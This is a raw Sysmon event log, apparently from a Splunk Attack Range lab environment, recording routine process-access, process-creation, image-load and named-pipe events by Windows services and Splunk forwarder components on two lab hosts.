10341000x800000000000000021219768Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.393{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219767Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.393{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219766Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.393{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219765Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.393{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5B82-618E-13CE-08000000F101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219764Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.393{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B82-618E-13CE-08000000F101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219763Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:10.378{AD5E2759-5B82-618E-13CE-08000000F101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057346128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.124{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057346127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.124{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057346126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.124{8B6011A9-5B81-618E-49F3-04000000F101}85806336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.093{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057346124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:10.093{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x800000000000000021219792Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.785{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B83-618E-15CE-08000000F101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219791Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.785{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219790Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.785{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219789Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.785{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219788Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.785{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219787Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.785{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5B83-618E-15CE-08000000F101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219786Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.785{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B83-618E-15CE-08000000F101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219785Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.769{AD5E2759-5B83-618E-15CE-08000000F101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219784Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:11.737{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68F3CEF7DE1BC01E2FFEE5E1CC26AB76,SHA256=73608771BB88E2336A094FCF7656E36EA0FFF40425D05E8DC26D46DD1F746E3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000057346307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.905{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057346306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.903{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057346305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.901{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057346304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.901{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x800000000000000057346303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057346302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057346301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057346300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057346299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057346298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057346297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057346295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057346294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.677{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057346293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057346292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057346291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057346290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057346288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:11.659{8B6011A9-5B83-618E-4CF3-04000000F101}7468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft 